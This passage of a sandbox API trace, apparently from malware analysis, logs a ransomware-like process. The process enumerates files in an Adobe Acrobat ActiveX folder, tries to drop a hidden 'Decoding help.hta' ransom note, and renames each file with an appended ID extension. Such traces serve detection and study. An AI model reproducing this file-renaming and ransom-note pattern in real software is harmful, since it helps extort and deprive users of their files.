lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.596] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.596] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.596] CloseHandle (hObject=0xffffffff) returned 0 [0046.597] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.597] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.SVE") returned 1 [0046.597] lstrlenW (lpString="AcroPDF.SVE") returned 11 [0046.597] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.597] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.597] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.SVE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE" [0046.597] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE" [0046.597] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE.[ID]g9uZrLhJaygpwRm1[ID]" [0046.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sve"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sve.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.597] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d938760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.TUR", cAlternateFileName="")) returned 1 [0046.597] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.597] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.597] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.597] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.597] CloseHandle (hObject=0xffffffff) returned 0 [0046.597] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.598] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.TUR") returned 1 [0046.598] lstrlenW (lpString="AcroPDF.TUR") returned 11 [0046.598] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.598] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.TUR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR" [0046.598] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR" [0046.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR.[ID]g9uZrLhJaygpwRm1[ID]" [0046.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.tur"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.tur.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.598] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d938760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.UKR", cAlternateFileName="")) returned 1 [0046.598] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.598] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.598] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.598] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.598] CloseHandle (hObject=0xffffffff) returned 0 [0046.598] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.599] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.UKR") returned 1 [0046.599] lstrlenW (lpString="AcroPDF.UKR") returned 11 [0046.599] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.599] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.599] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.UKR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR" [0046.599] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR" [0046.599] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR.[ID]g9uZrLhJaygpwRm1[ID]" [0046.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ukr"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ukr.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.599] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.CAT", cAlternateFileName="")) returned 1 [0046.599] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.599] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.599] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.599] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.599] CloseHandle (hObject=0xffffffff) returned 0 [0046.599] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.600] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.CAT") returned -1 [0046.600] lstrlenW (lpString="PDFShell.CAT") returned 12 [0046.600] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.600] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.600] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.CAT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT" [0046.600] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT" [0046.600] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT.[ID]g9uZrLhJaygpwRm1[ID]" [0046.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cat"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0047.966] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8058e120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.CHS", cAlternateFileName="")) returned 1 [0049.180] lstrcpyW (in: lpString1=0x10d5eb58, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0049.180] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0049.180] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0049.180] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0049.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.181] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0049.181] CloseHandle (hObject=0xffffffff) returned 0 [0049.181] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0049.181] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.CHS") returned -1 [0049.181] lstrlenW (lpString="PDFShell.CHS") returned 12 [0049.181] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0049.181] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0049.181] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.CHS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS" [0049.181] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS" [0049.181] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS.[ID]g9uZrLhJaygpwRm1[ID]" [0049.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.chs"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.chs.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.612] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8058e120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.CHT", cAlternateFileName="")) returned 1 [0050.612] lstrcpyW (in: lpString1=0x10bce4c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0050.612] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0050.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0050.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0050.652] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.652] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0050.652] CloseHandle (hObject=0xffffffff) returned 0 [0050.652] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0050.652] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.CHT") returned -1 [0050.652] lstrlenW (lpString="PDFShell.CHT") returned 12 [0050.652] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0050.652] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common 